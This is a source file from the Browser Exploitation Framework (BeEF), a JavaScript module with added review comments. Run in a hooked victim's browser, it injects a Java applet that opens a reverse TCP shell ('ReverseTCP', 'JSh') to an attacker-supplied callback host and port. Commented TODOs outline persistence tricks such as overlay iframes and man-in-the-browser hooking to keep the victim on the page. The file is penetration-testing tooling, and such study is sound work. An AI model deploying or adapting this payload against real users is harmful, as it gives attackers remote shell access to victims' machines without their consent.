//
// Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// Module body: attaches a Java applet to the hooked page and then reports
// back to the BeEF server that the element was added to the DOM.
//
// NOTE(review): every '<%= ... %>' below is an ERB placeholder rendered
// server-side straight into a single-quoted JS string literal with no
// escaping visible here. A value containing a quote or newline would break
// (or change) the generated script — TODO confirm how the Ruby side of this
// module populates these values.
var conn = '<%= @conn %>'; // assigned but not referenced anywhere else in this block
var cbHost = '<%= @cbHost %>';
var cbPort = '<%= @cbPort %>';
// The archive is fetched from the BeEF server itself: same scheme, host and
// port as the hook connection, fixed path '/anti.jar'.
var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/anti.jar';
var applet_id = '<%= @applet_id %>';
var applet_name = '<%= @applet_name %>';
// Parameters are handed to the applet as one object; 'argc' must equal the
// number of 'argN' keys supplied (here 5: arg0..arg4). The fourth argument
// (null) is passed through as-is — presumably an unused/default slot; verify
// against beef.dom.attachApplet's signature.
beef.dom.attachApplet(applet_id, applet_name, 'javapayload.loader.AppletLoader',
null, applet_archive, [{'argc':'5', 'arg0':'ReverseTCP', 'arg1':cbHost, 'arg2':cbPort, 'arg3':'--', 'arg4':'JSh'}]);
//TODO: modify the applet in a way we can call a method from it, or create a Javascript variable in the page (to know the applet has started).
//TODO: after that, every N seconds we'll check if the user RUN the applet, otherwise we remove the applet and inject another one.
//TODO: =========== persistence techniques ===========
// the victim must stay on the page while the applet is running. we don't want to use hybrid techniques to
// download platform dependent executable (i.e. meterpreter) and then kill the applet.
// we have 2 options:
// 1. use the MITB code (currently doesn't work on IE)
// 2. create an overlay iFrame while having the applet runnin in the background
//
// 1. setTimeout(beef.dom.createIframe('fullscreen', {'src':"<%= @iFrameSrc %>", 'id':"overlayiframe", 'name':"overlayiframe"}, {}, null), 4000);
// 2. beef.mitb.init("<%= @command_url %>", <%= @command_id %>);
// var MITBload = setInterval(function(){
// if(beef.pageIsLoaded){
// clearInterval(MITBload);
// beef.mitb.hook();
// }
// }, 100);
// Note that nothing above waits for or verifies that the applet actually
// started; "added to the DOM" is all this message asserts.
beef.debug('[Java Payload] Applet with id[' + applet_id + '] added to the DOM.');
// Same status text is posted back to the server for this command. The
// command id placeholder is rendered bare (unquoted), so the template must
// supply a value that is valid as a JS expression — TODO confirm.
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Applet with id[' + applet_id + '] added to the DOM.');
});